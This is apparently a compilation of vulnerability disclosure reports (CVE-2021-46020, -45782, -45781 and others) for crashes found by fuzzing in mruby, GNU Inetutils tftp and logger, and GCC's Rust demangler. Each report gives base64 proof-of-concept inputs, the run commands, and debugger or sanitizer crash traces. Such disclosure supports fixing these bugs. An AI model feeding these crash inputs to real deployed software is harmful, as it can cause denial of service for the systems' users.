An untrusted pointer dereference in mrb_vm_exec() of mruby v3.0.0 can lead to a segmentation fault or application crash.

**Untrusted Pointer Dereference in mrb\_vm\_exec()****Description**

An Untrusted Pointer Dereference was discovered in mrb\_vm\_exec(). The vulnerability causes a segmentation fault and application crash.

**version**

6de0fcb

    ./mruby -v
    mruby 3.0.0 (2021-03-05)
    

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**Proof of Concept**

**poc**

    base64 poc
    Y2xhc3MgVmNsYXNzDQoJQEB2YXJyID0gWzE8MiwzLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0
    LDE1LDE2LDE3XQ0KCWRlZiB2YXJyDQoJCUBAdmFycg0KCWVuZA0KCWRlZiB0b19pJnQNCgkJQEB2
    YXJyLmNsZWFyDQoJCTExDQoJZW5kDQplbmQNCg0Kb2JqID0gVmNsYXNzLm5ldw0KDQpwcmludCBv
    YmoudmFyci5zaGlmdChvYmop
    

**command:**

**Result**

    ./mruby ./poc
    [1]    283553 segmentation fault  ./mruby ./poc
    

**gdb**

    Program received signal SIGSEGV, Segmentation fault.
    mrb_vm_exec (mrb=<optimized out>, proc=<optimized out>, pc=0x55555561f7c3 <mrblib_proc_iseq_115+99> "/\006\003\001=\005\001%\377\331Q\006\002\001\a\004Q\b\003/\a\004\001<\006Q\a\004<\006\070\006") at /home/aidai/fuzzing/mruby/mruby-master/include/mruby/boxing_word.h:139
    139       return x;
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ───────────────────────────────[ REGISTERS ]────────────────────────────────
     RAX  0x10
     RBX  0x38
     RCX  0x7
     RDX  0x0
     RDI  0x1
     RSI  0xffffffff
     R8   0x6
     R9   0x0
     R10  0x1
     R11  0x55555566fb08 ◂— 0x10
     R12  0x2eb
     R13  0x10
     R14  0x7
     R15  0x2f
     RBP  0x0
     RSP  0x7fffffffdad0 —▸ 0x55555565d2a0 —▸ 0x7fffffffdd50 ◂— 0x6
     RIP  0x55555557988e (mrb_vm_exec+2590) ◂— cmp    byte ptr [r13 + 0x10], 0x13
    ─────────────────────────────────[ DISASM ]─────────────────────────────────
     ► 0x55555557988e <mrb_vm_exec+2590>     cmp    byte ptr [r13 + 0x10], 0x13
       0x555555579893 <mrb_vm_exec+2595>     mov    rdx, r13
       0x555555579896 <mrb_vm_exec+2598>     ja     mrb_vm_exec+16844
         <mrb_vm_exec+16844>
        ↓
       0x55555557d03c <mrb_vm_exec+16844>    mov    rax, qword ptr [rdx]
       0x55555557d03f <mrb_vm_exec+16847>    jmp    mrb_vm_exec+1400
        <mrb_vm_exec+1400>
        ↓
       0x5555555793e8 <mrb_vm_exec+1400>     lea    rcx, [rsp + 0x268]
       0x5555555793f0 <mrb_vm_exec+1408>     mov    rdi, qword ptr [rsp]
       0x5555555793f4 <mrb_vm_exec+1412>     mov    edx, r12d
       0x5555555793f7 <mrb_vm_exec+1415>     mov    qword ptr [rsp + 0x268], rax
       0x5555555793ff <mrb_vm_exec+1423>     mov    rsi, rcx
       0x555555579402 <mrb_vm_exec+1426>     mov    qword ptr [rsp + 0x70], rcx
    ─────────────────────────────[ SOURCE (CODE) ]──────────────────────────────
    In file: /home/aidai/fuzzing/mruby/mruby-master/include/mruby/boxing_word.h
       134 static inline union mrb_value_
       135 mrb_val_union(mrb_value v)
       136 {
       137   union mrb_value_ x;
       138   x.value = v;
     ► 139   return x;
       140 }
       141
       142 MRB_API mrb_value mrb_word_boxing_cptr_value(struct mrb_state*, void*);
       143 #ifndef MRB_NO_FLOAT
       144 MRB_API mrb_value mrb_word_boxing_float_value(struct mrb_state*, mrb_float);
    ─────────────────────────────────[ STACK ]──────────────────────────────────
    00:0000│ rsp 0x7fffffffdad0 —▸ 0x55555565d2a0 —▸ 0x7fffffffdd50 ◂— 0x6
    01:0008│     0x7fffffffdad8 —▸ 0x55555561f7c3 (mrblib_proc_iseq_115+99) ◂— 0x2501053d0103062f
    02:0010│     0x7fffffffdae0 —▸ 0x55555564c2a0 (mrblib_proc_irep_115) ◂— 0x30000000b0006
    03:0018│     0x7fffffffdae8 —▸ 0x55555561f7f0 (mrblib_proc_syms_115) ◂— 0x36700000125
    04:0020│     0x7fffffffdaf0 —▸ 0x7fffffffdd50 ◂— 0x6
    05:0028│     0x7fffffffdaf8 —▸ 0x55555567be90 —▸ 0x55555567be60 —▸ 0x55555567be48 ◂— 0x1a
    06:0030│     0x7fffffffdb00 ◂— 0x1
    07:0038│     0x7fffffffdb08 —▸ 0x55555566a2b0 ◂— 0x0
    ───────────────────────────────[ BACKTRACE ]────────────────────────────────
     ► f 0   0x55555557988e mrb_vm_exec+2590
       f 1   0x55555558300b mrb_vm_run+155
       f 2   0x555555584ed5 mrb_top_run+133
       f 3   0x5555555c7540 mrb_load_exec+752
       f 4   0x5555555c92b0 mrb_load_detect_file_cxt+400
       f 5   0x5555555756de main+1486
       f 6   0x7ffff7c980b3 __libc_start_main+243
    ────────────────────────────────────────────────────────────────────────────
    pwndbg> bt
    #0  mrb_vm_exec (mrb=<optimized out>, proc=<optimized out>, pc=0x55555561f7c3 <mrblib_proc_iseq_115+99> "/\006\003\001=\005\001%\377\331Q\006\002\001\a\004Q\b\003/\a\004\001<\006Q\a\004<\006\070\006") at /home/aidai/fuzzing/mruby/mruby-master/include/mruby/boxing_word.h:139
    #1  0x000055555558300b in mrb_vm_run (mrb=0x55555565d2a0, proc=proc@entry=0x555555661b50, self=..., stack_keep=0) at /home/aidai/fuzzing/mruby/mruby-master/src/vm.c:1091
    #2  0x0000555555584ed5 in mrb_top_run (mrb=mrb@entry=0x55555565d2a0, proc=proc@entry=0x555555661b50, self=..., stack_keep=stack_keep@entry=0) at /home/aidai/fuzzing/mruby/mruby-master/src/vm.c:3050
    #3  0x00005555555c7540 in mrb_load_exec (mrb=mrb@entry=0x55555565d2a0, p=p@entry=0x55555567aa10, c=c@entry=0x555555679940) at mrbgems/mruby-compiler/core/parse.y:6881
    #4  0x00005555555c92b0 in mrb_load_detect_file_cxt (mrb=0x55555565d2a0, fp=0x555555679740, c=0x555555679940) at mrbgems/mruby-compiler/core/parse.y:6794
    #5  0x00005555555756de in main (argc=argc@entry=2, argv=argv@entry=0x7fffffffe248) at /home/aidai/fuzzing/mruby/mruby-master/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
    #6  0x00007ffff7c980b3 in __libc_start_main (main=0x555555575110 <main>, argc=2, argv=0x7fffffffe248, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe238) at ../csu/libc-start.c:308
    #7  0x0000555555575a5e in _start () at /home/aidai/fuzzing/mruby/mruby-master/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:282

CVE-2021-46020: Untrusted Pointer Dereference in mrb_vm_exec() · Issue #5613 · mruby/mruby

An untrusted pointer dereference in rec_db_destroy() at rec-db.c of GNU Recutils v1.8.90 can lead to a segmentation fault or application crash.

CVE-2021-46019: Untrusted Pointer Dereference in rec_db_destroy()

An untrusted pointer dereference in getcmd() at inetutils/src/tftp.c of GNU Inetutils v2.2.16-cf091 can lead to a segmentation fault or application crash.

\# Untrusted Pointer Dereference in getcmd() at inetutils/src/tftp.c:878

\## Description

An Untrusted Pointer Dereference was discovered in getcmd() at inetutils/src/tftp.c:878. The vulnerability causes a segmentation fault and application crash.

\*\*version\*\*

\`\`\`  
./tftp --version  
tftp (GNU inetutils) 2.2.16-cf091  
Copyright (C) 2021 Free Software Foundation, Inc.  
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html\>.  
This is free software: you are free to change and redistribute it.  
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.  
\`\`\`

\*\*System information\*\*  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

\## Proof of Concept

\*\*poc\*\*

\`\`\`  
base64 poc  
PyA/IGIg/zc/IGIgEMoiICIgEAsgYiDKysogIiAQNyIiIyIgIiAQCyA/IGIgNwQgIP83IyIgIiAQ  
CyA6uwQvHiIUYiDKysrKPyA/IGIgEMoiICIgEDciIiMiICIgEAsgPyBiIDcEICD/NyMiICIgEAsg  
OrsELx4iFGIgysrKyj8gPyBiIBDKIiAiIBALIGIgysrKICIpEDciICIgEAsgYiDKysogIiAQNyIi  
IABAMAsg  
\`\`\`

\*\*command:\*\*

\`\`\`  
./tftp < ./poc  
\`\`\`

\*\*Result\*\*

\`\`\`  
./tftp < poc  
print help information  
set mode to octet  
?Invalid help command �7?  
set mode to octet  
?Invalid help command �"  
?Invalid help command "  
?Invalid help command  
set mode to octet  
?Invalid help command ���  
?Invalid help command "  
?Invalid help command 7""#"  
?Invalid help command "  
?Invalid help command  
print help information  
set mode to octet  
?Invalid help command 7  
?Invalid help command �7#"  
?Invalid help command "  
?Invalid help command  
?Invalid help command :� / " b  
?Invalid help command ����?  
print help information  
set mode to octet  
?Invalid help command �"  
?Invalid help command "  
?Invalid help command 7""#"  
?Invalid help command "  
?Invalid help command  
print help information  
set mode to octet  
?Invalid help command 7  
?Invalid help command �7#"  
?Invalid help command "  
?Invalid help command  
?Invalid help command :� / " b  
?Invalid help command ����?  
print help information  
set mode to octet  
?Invalid help command �"  
?Invalid help command "  
?Invalid help command  
set mode to octet  
?Invalid help command ���  
?Invalid help command ") 7"  
?Invalid help command "  
?Invalid help command  
set mode to octet  
?Invalid help command ���  
?Invalid help command "  
\[1\]    1736392 segmentation fault  ./tftp < poc  
\`\`\`

\*\*gdb\*\*

\`\`\`  
Program received signal SIGSEGV, Segmentation fault.  
0x0000555555558bc4 in getcmd (name=0x555500000033 <error: Cannot access memory at address 0x555500000033>) at tftp.c:878  
878       for (c = cmdtab; (p = c->name) != NULL; c++)  
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA  
────────────────────────────────────────────\[ REGISTERS \]─────────────────────────────────────────────  
 RAX  0x18  
 RBX  0x555555567b50 (margc) ◂— 0x555500000033 /\* '3' \*/  
 RCX  0x0  
 RDX  0x0  
 RDI  0x555500000033  
 RSI  0x55555556258c ◂— 0x7463656e6e6f63 /\* 'connect' \*/  
 R8   0x0  
 R9   0x18  
 R10  0x55555556243b ◂— 0x203a70746674000a /\* '\\n' \*/  
 R11  0x246  
 R12  0x555500000033  
 R13  0x555555562423 ◂— '?Invalid help command %s\\n'  
 R14  0x0  
 R15  0x0  
 RBP  0x555555567b50 (margc) ◂— 0x555500000033 /\* '3' \*/  
 RSP  0x7fffffffe138 —▸ 0x555555558cce (help+78) ◂— cmp    rax, -1  
 RIP  0x555555558bc4 (getcmd+20) ◂— movzx  r9d, byte ptr \[rdi\]  
──────────────────────────────────────────────\[ DISASM \]──────────────────────────────────────────────  
 ► 0x555555558bc4 <getcmd+20>    movzx  r9d, byte ptr \[rdi\]  
   0x555555558bc8 <getcmd+24>    push   rbx  
   0x555555558bc9 <getcmd+25>    xor    r11d, r11d  
   0x555555558bcc <getcmd+28>    xor    r10d, r10d  
   0x555555558bcf <getcmd+31>    xor    ebx, ebx  
   0x555555558bd1 <getcmd+33>    lea    r8, \[rip + 0xe7c8\]            <0x5555555673a0>  
   0x555555558bd8 <getcmd+40>    lea    rcx, \[rsi + 1\]  
   0x555555558bdc <getcmd+44>    mov    rdx, rdi  
   0x555555558bdf <getcmd+47>    mov    eax, r9d  
   0x555555558be2 <getcmd+50>    cmp    byte ptr \[rsi\], r9b  
   0x555555558be5 <getcmd+53>    je     getcmd+80                <getcmd+80>  
──────────────────────────────────────────\[ SOURCE (CODE) \]───────────────────────────────────────────  
In file: /home/aidai/fuzzing/inetutils/inetutils/src/tftp.c  
   873   register int nmatches, longest;  
   874  
   875   longest = 0;  
   876   nmatches = 0;  
   877   found = 0;  
 ► 878   for (c = cmdtab; (p = c->name) != NULL; c++)  
   879     {  
   880       for (q = name; \*q == \*p++; q++)  
   881  if (\*q == 0)            /\* exact match? \*/  
   882    return (c);  
   883  
──────────────────────────────────────────────\[ STACK \]───────────────────────────────────────────────  
00:0000│ rsp 0x7fffffffe138 —▸ 0x555555558cce (help+78) ◂— cmp    rax, -1  
01:0008│     0x7fffffffe140 —▸ 0x55555556b710 ◂— 0x0  
02:0010│     0x7fffffffe148 —▸ 0x5555555610f0 (\_\_libc\_csu\_init) ◂— endbr64  
03:0018│     0x7fffffffe150 ◂— 0x33 /\* '3' \*/  
04:0020│     0x7fffffffe158 —▸ 0x5555555679c0 (margv) —▸ 0x555555567b80 (line) ◂— 0x37ff0062003f003f /\* '?' \*/  
05:0028│     0x7fffffffe160 —▸ 0x7fffffffe270 ◂— 0x1  
06:0030│     0x7fffffffe168 —▸ 0x555555557b83 (main+387) ◂— jmp    0x555555557b29  
07:0038│     0x7fffffffe170 —▸ 0x7fffffffe270 ◂— 0x1  
────────────────────────────────────────────\[ BACKTRACE \]─────────────────────────────────────────────  
 ► f 0   0x555555558bc4 getcmd+20  
   f 1   0x555555558cce help+78  
   f 2   0x555555557b83 main+387  
   f 3   0x555555557b83 main+387  
   f 4   0x7ffff7de70b3 \_\_libc\_start\_main+243  
──────────────────────────────────────────────────────────────────────────────────────────────────────  
pwndbg> bt  
#0  0x0000555555558bc4 in getcmd (name=0x555500000033 <error: Cannot access memory at address 0x555500000033>) at tftp.c:878  
#1  0x0000555555558cce in help (argc=<optimized out>, argv=0x555555567b50 <margc>) at tftp.c:955  
#2  0x0000555555557b83 in command () at tftp.c:864  
#3  main (argc=argc@entry=1, argv=argv@entry=0x7fffffffe278) at tftp.c:298  
#4  0x00007ffff7de70b3 in \_\_libc\_start\_main (main=0x555555557a00 <main>, argc=1, argv=0x7fffffffe278, init=<optimized out>, fini=<optimized out>, rtld\_fini=<optimized out>, stack\_end=0x7fffffffe268) at ../csu/libc-start.c:308  
#5  0x0000555555557c0e in \_start () at /usr/include/x86\_64-linux-gnu/bits/stdio2.h:107  
\`\`\`

CVE-2021-45782: Untrusted Pointer Dereference in getcmd() at inetutils/src/tftp.c:878

GNU Inetutils 2.2.16-cf091 was discovered to contain a heap-based buffer overflow via the component logger at inetutils/src/logger.c.

\# Heap-based Buffer Overflow in logger

\## Description

Heap-based Buffer Overflow in logger at inetutils/src/logger.c:329

\*\*version\*\*

\`\`\`  
./logger --version  
logger (GNU inetutils) 2.2.16-cf091  
Copyright (C) 2021 Free Software Foundation, Inc.  
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html\>.  
This is free software: you are free to change and redistribute it.  
There is NO WARRANTY, to the extent permitted by law.

Written by Sergey Poznyakoff.  
\`\`\`

\*\*System information\*\*  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

\*\*poc\*\*

\`\`\`  
base64 poc  
ZYdn/3JycmMjY2NPcnJjI2NjTwCAAAoAAIAAAABECm5vjAB9UQpubm9ybREqGzZNaYSEKhs2TWmE  
hHY=  
\`\`\`

\*\*command\*\*

\`\`\`  
./logger -s < ./poc  
\`\`\`

\*\*Result\*\*

\`\`\`  
 ./logger -s < ./poc  
e�g�rrrc#ccOrrc#ccO  
\=================================================================  
\==4156==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000003f at pc 0x0000004c679b bp 0x7ffe5f3b7250 sp 0x7ffe5f3b7248  
READ of size 1 at 0x60c00000003f thread T0  
    #0 0x4c679a in send\_to\_syslog /root/disk2/fuzzing/inetutils/inetutils/src/logger.c:329:11  
    #1 0x4c5cf2 in main /root/disk2/fuzzing/inetutils/inetutils/src/logger.c:511:2  
    #2 0x7fa5804200b2 in \_\_libc\_start\_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16  
    #3 0x41c46d in \_start (/root/disk2/fuzzing/inetutils/fuzz/bin/logger+0x41c46d)

0x60c00000003f is located 1 bytes to the left of 120-byte region \[0x60c000000040,0x60c0000000b8)  
allocated by thread T0 here:  
    #0 0x494bad in malloc (/root/disk2/fuzzing/inetutils/fuzz/bin/logger+0x494bad)  
    #1 0x7fa58047f6c3 in getdelim /build/glibc-eX1tMB/glibc-2.31/libio/iogetdelim.c:62:27  
    #2 0x8000000000000005  (<unknown module>)

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/disk2/fuzzing/inetutils/inetutils/src/logger.c:329:11 in send\_to\_syslog  
Shadow bytes around the buggy address:  
  0x0c187fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x0c187fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x0c187fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x0c187fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x0c187fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
\=>0x0c187fff8000: fa fa fa fa fa fa fa\[fa\]00 00 00 00 00 00 00 00  
  0x0c187fff8010: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa  
  0x0c187fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0c187fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0c187fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0c187fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
Shadow byte legend (one shadow byte represents 8 application bytes):  
  Addressable:           00  
  Partially addressable: 01 02 03 04 05 06 07  
  Heap left redzone:       fa  
  Freed heap region:       fd  
  Stack left redzone:      f1  
  Stack mid redzone:       f2  
  Stack right redzone:     f3  
  Stack after return:      f5  
  Stack use after scope:   f8  
  Global redzone:          f9  
  Global init order:       f6  
  Poisoned by user:        f7  
  Container overflow:      fc  
  Array cookie:            ac  
  Intra object redzone:    bb  
  ASan internal:           fe  
  Left alloca redzone:     ca  
  Right alloca redzone:    cb  
  Shadow gap:              cc  
\==4156==ABORTING  
\`\`\`

CVE-2021-45781: Heap-based Buffer Overflow in logger

An Use-After-Free vulnerability in rec_mset_elem_destroy() at rec-mset.c of GNU Recutils v1.8.90 can lead to a segmentation fault or application crash.

CVE-2021-46022: Use After Free in in rec_mset_elem_destroy() at rec-mset.c:83

GCC v12.0 was discovered to contain an uncontrolled recursion via the component libiberty/rust-demangle.c. This vulnerability allows attackers to cause a Denial of Service (DoS) by consuming excessive CPU and memory resources.

\# Uncontrolled Recursion in libiberty/rust-demangle.c

## Description

An Uncontrolled Recursion was discovered in libiberty/rust-demangle.c. The vulnerability could allow attackers to consume excessive resources such as CPU or memory.

\*\*version\*\*

gcc: ad6091d1b891cc8aeda27850c4035f9b6163dcb0

binutils: d16ce6240e556133549f4f69927eb99b28978af2

\*\*System information\*\*
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

## Proof of Concept

\*\*poc\*\*

\`\`\`
base64 poc
ZPGoqKioqKj6/ytu8rq7H9UdEJpfUkJfAKh//4ioqKioqKj//2EAAAAA//8AAAQFAG1Ycy8XABgAQgAS//9lP0BHcnJycotdJPMrXNNcfOJ6mgAAXCtmIEi3AAAQ
\`\`\`

\*\*command\*\*

\`\`\`
./c++filt < ./poc
\`\`\`

\*\*Result\*\*

\`\`\`
./c++filt < ./poc
\[1\]    881695 segmentation fault  ./c++filt < ./poc
\`\`\`

\*\*gdb\*\*

\`\`\`
Program received signal SIGSEGV, Segmentation fault.
0x000055555564082d in demangle\_path (rdm=0x7fffffffe040, in\_value=in\_value@entry=1) at ./rust-demangle.c:769
769           backref = parse\_integer\_62 (rdm);
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────────────\[ REGISTERS \]─────────────────────────────────────────────────────
 RAX  0x0
 RBX  0x42
 RCX  0x2
 RDX  0x0
 RDI  0x7fffffffe040 —▸ 0x555555696142 (mbuffer+2) ◂— 0x5f42 /\* 'B\_' \*/
 RSI  0x55555564082a (demangle\_path+970) ◂— mov    rdi, rbp
 R8   0x555555696142 (mbuffer+2) ◂— 0x5f42 /\* 'B\_' \*/
 R9   0x555555666024 ◂— 0xfffda778fffda806
 R10  0x0
 R11  0x555555696140 (mbuffer) ◂— 0x5f42525f /\* '\_RB\_' \*/
 R12  0x1
 R13  0x5555556662a0 (\_sch\_istable) ◂— 0x2000200020802
 R14  0x55555564246b ◂— 0x69727473002e245f /\* '\_$.' \*/
 R15  0x555555696140 (mbuffer) ◂— 0x5f42525f /\* '\_RB\_' \*/
 RBP  0x7fffffffe040 —▸ 0x555555696142 (mbuffer+2) ◂— 0x5f42 /\* 'B\_' \*/
 RSP  0x7fffff7ff000 ◂— 0x0
 RIP  0x55555564082d (demangle\_path+973) ◂— call   0x55555563e360
──────────────────────────────────────────────────────\[ DISASM \]──────────────────────────────────────────────────────
   0x55555564082a <demangle\_path+970>     mov    rdi, rbp
 ► 0x55555564082d <demangle\_path+973>     call   parse\_integer\_62                <parse\_integer\_62>
        rdi: 0x7fffffffe040 —▸ 0x555555696142 (mbuffer+2) ◂— 0x5f42 /\* 'B\_' \*/

   0x555555640832 <demangle\_path+978>     mov    edx, dword ptr \[rbp + 0x2c\]
   0x555555640835 <demangle\_path+981>     test   edx, edx
   0x555555640837 <demangle\_path+983>     jne    demangle\_path+64                <demangle\_path+64>

   0x55555564083d <demangle\_path+989>     mov    rbx, qword ptr \[rbp + 0x20\]
   0x555555640841 <demangle\_path+993>     mov    qword ptr \[rbp + 0x20\], rax
   0x555555640845 <demangle\_path+997>     mov    esi, r12d
   0x555555640848 <demangle\_path+1000>    call   demangle\_path                <demangle\_path>

   0x55555564084d <demangle\_path+1005>    mov    qword ptr \[rbp + 0x20\], rbx
   0x555555640851 <demangle\_path+1009>    jmp    demangle\_path+64                <demangle\_path+64>
──────────────────────────────────────────────────\[ SOURCE (CODE) \]───────────────────────────────────────────────────
In file: /home/aidai/fuzzing/binutils/binutils-gdb/libiberty/rust-demangle.c
   764           demangle\_generic\_arg (rdm);
   765         }
   766       PRINT (">");
   767       break;
   768     case 'B':
 ► 769       backref = parse\_integer\_62 (rdm);
   770       if (!rdm->skipping\_printing)
   771         {
   772           old\_next = rdm->next;
   773           rdm->next = backref;
   774           demangle\_path (rdm, in\_value);
──────────────────────────────────────────────────────\[ STACK \]───────────────────────────────────────────────────────
00:0000│ rsp 0x7fffff7ff000 ◂— 0x0
... ↓        6 skipped
07:0038│     0x7fffff7ff038 ◂— 0xb50269d9f4754500
────────────────────────────────────────────────────\[ BACKTRACE \]─────────────────────────────────────────────────────
 ► f 0   0x55555564082d demangle\_path+973
   f 1   0x55555564084d demangle\_path+1005
   f 2   0x55555564084d demangle\_path+1005
   f 3   0x55555564084d demangle\_path+1005
   f 4   0x55555564084d demangle\_path+1005
   f 5   0x55555564084d demangle\_path+1005
   f 6   0x55555564084d demangle\_path+1005
   f 7   0x55555564084d demangle\_path+1005
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
\`\`\`

\*\*poc2\*\*

\`\`\`
base64 poc
aUlaDwAAEGQ6YwAcAP9hAABaAAAAAAB/X1JZQl+DYQIMAABBPVuAAAAAACA6Ui44/zo6Ojr/Ojo6
Ojo6TzD9YhBP8QAAABAkTwBAYv///eAjABAkEBBcXFwQEFxcXDw=
\`\`\`

\*\*command\*\*

\`\`\`
./c++filt < ./poc
\`\`\`

\*\*Result\*\*

\`\`\`
\[1\]    1731144 segmentation fault  ./c++filt < ./poc
\`\`\`

\*\*gdb\*\*

\`\`\`
Program received signal SIGSEGV, Segmentation fault.
demangle\_type (rdm=0x7fffffffe040) at ./rust-demangle.c:866
866       basic = basic\_type (tag);
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────────────\[ REGISTERS \]─────────────────────────────────────────────────────
 RAX  0x555555696142 (mbuffer+2) ◂— 0x5f4259 /\* 'YB\_' \*/
 RBX  0x555555665fd4 ◂— 0xfffd9f3ffffd9f68
 RCX  0x2
 RDX  0x1
 RDI  0x42
 RSI  0x3
 R8   0x555555665364 ◂— 0x3d2d00496d003c /\* '<' \*/
 R9   0x555555666024 ◂— 0xfffda778fffda806
 R10  0x0
 R11  0x7ffff7fa5be0 (main\_arena+96) —▸ 0x5555556b06c0 ◂— 0x0
 R12  0x0
 R13  0x42
 R14  0x0
 R15  0x555555696140 (mbuffer) ◂— 0x5f4259525f /\* '\_RYB\_' \*/
 RBP  0x7fffffffe040 —▸ 0x555555696142 (mbuffer+2) ◂— 0x5f4259 /\* 'YB\_' \*/
 RSP  0x7fffff7ff000 ◂— 0x0
 RIP  0x55555563fc9c (demangle\_type+476) ◂— call   0x55555563e7c0
──────────────────────────────────────────────────────\[ DISASM \]──────────────────────────────────────────────────────
 ► 0x55555563fc9c <demangle\_type+476>    call   basic\_type                <basic\_type>
        rdi: 0x42

   0x55555563fca1 <demangle\_type+481>    mov    r12, rax
   0x55555563fca4 <demangle\_type+484>    test   rax, rax
   0x55555563fca7 <demangle\_type+487>    jne    demangle\_type+408                <demangle\_type+408>

   0x55555563fca9 <demangle\_type+489>    lea    eax, \[r13 - 0x41\]
   0x55555563fcad <demangle\_type+493>    cmp    al, 0x13
   0x55555563fcaf <demangle\_type+495>    ja     demangle\_type+96                <demangle\_type+96>

   0x55555563fcb5 <demangle\_type+501>    movzx  eax, al
   0x55555563fcb8 <demangle\_type+504>    movsxd rax, dword ptr \[rbx + rax\*4\]
   0x55555563fcbc <demangle\_type+508>    add    rax, rbx
   0x55555563fcbf <demangle\_type+511>    jmp    rax
──────────────────────────────────────────────────\[ SOURCE (CODE) \]───────────────────────────────────────────────────
In file: /home/aidai/fuzzing/binutils/binutils-gdb/libiberty/rust-demangle.c
   861   if (rdm->errored)
   862     return;
   863
   864   tag = next (rdm);
   865
 ► 866   basic = basic\_type (tag);
   867   if (basic)
   868     {
   869       PRINT (basic);
   870       return;
   871     }
──────────────────────────────────────────────────────\[ STACK \]───────────────────────────────────────────────────────
00:0000│ rsp 0x7fffff7ff000 ◂— 0x0
... ↓        4 skipped
05:0028│     0x7fffff7ff028 ◂— 0x1985771200307400
06:0030│     0x7fffff7ff030 ◂— 0x0
07:0038│     0x7fffff7ff038 ◂— 0x59 /\* 'Y' \*/
────────────────────────────────────────────────────\[ BACKTRACE \]─────────────────────────────────────────────────────
 ► f 0   0x55555563fc9c demangle\_type+476
   f 1   0x555555640547 demangle\_path+231
   f 2   0x55555563ff33 demangle\_type+1139
   f 3   0x555555640547 demangle\_path+231
   f 4   0x55555563ff33 demangle\_type+1139
   f 5   0x555555640547 demangle\_path+231
   f 6   0x55555563ff33 demangle\_type+1139
   f 7   0x555555640547 demangle\_path+231
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>
\`\`\`

\*\*poc3\*\*

\`\`\`
base64 poc
aWYgeHMoEP//X1AgL61NPD1bZRAAAAA8srKysrKysrKysrKyXFxcYXRjbyBAbiD//yDPTCBHJiZv
b21vbxByZf9/X1JZREJfJmEAgAAAEABoaWEvaRAQXFxvXA==
\`\`\`

\*\*command\*\*

\`\`\`
./c++filt < ./poc
\`\`\`

\*\*Result\*\*

\`\`\`
./c++filt < ./poc
\[1\]    2031222 segmentation fault  ./c++filt < ./poc
\`\`\`

\*\*gdb\*\*

\`\`\`
Program received signal SIGSEGV, Segmentation fault.
0x000055555563f9b3 in demangle\_path\_maybe\_open\_generics (rdm=rdm@entry=0x7fffffffe040) at ./rust-demangle.c:1075
1075        demangle\_path (rdm, 0);
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────────────\[ REGISTERS \]─────────────────────────────────────────────────────
 RAX  0x0
 RBX  0x4
 RCX  0x0
 RDX  0x59
 RDI  0x7fffffffe040 —▸ 0x555555696142 (mbuffer+2) ◂— 0x5f424459 /\* 'YDB\_' \*/
 RSI  0x0
 R8   0x555555665ede ◂— 0x202b2000206e7964 /\* 'dyn ' \*/
 R9   0x4
 R10  0x0
 R11  0x246
 R12  0x0
 R13  0x7fffff7ff040 ◂— 0x0
 R14  0x0
 R15  0x555555696140 (mbuffer) ◂— 0x5f424459525f /\* '\_RYDB\_' \*/
 RBP  0x7fffffffe040 —▸ 0x555555696142 (mbuffer+2) ◂— 0x5f424459 /\* 'YDB\_' \*/
 RSP  0x7fffff7ff000 ◂— 0x4
 RIP  0x55555563f9b3 (demangle\_path\_maybe\_open\_generics+35) ◂— call   0x555555640460
──────────────────────────────────────────────────────\[ DISASM \]──────────────────────────────────────────────────────
 ► 0x55555563f9b3 <demangle\_path\_maybe\_open\_generics+35>    call   demangle\_path                <demangle\_path>
        rdi: 0x7fffffffe040 —▸ 0x555555696142 (mbuffer+2) ◂— 0x5f424459 /\* 'YDB\_' \*/
        rsi: 0x0

   0x55555563f9b8 <demangle\_path\_maybe\_open\_generics+40>    mov    eax, r12d
   0x55555563f9bb <demangle\_path\_maybe\_open\_generics+43>    pop    rbx
   0x55555563f9bc <demangle\_path\_maybe\_open\_generics+44>    pop    rbp
   0x55555563f9bd <demangle\_path\_maybe\_open\_generics+45>    pop    r12
   0x55555563f9bf <demangle\_path\_maybe\_open\_generics+47>    ret

   0x55555563f9c0 <demangle\_path\_maybe\_open\_generics+48>    mov    rdx, qword ptr \[rdi\]
   0x55555563f9c3 <demangle\_path\_maybe\_open\_generics+51>    movzx  edx, byte ptr \[rdx + rax\]
   0x55555563f9c7 <demangle\_path\_maybe\_open\_generics+55>    cmp    dl, 0x42
   0x55555563f9ca <demangle\_path\_maybe\_open\_generics+58>    je     demangle\_path\_maybe\_open\_generics+208
  <demangle\_path\_maybe\_open\_generics+208>

   0x55555563f9d0 <demangle\_path\_maybe\_open\_generics+64>    cmp    dl, 0x49
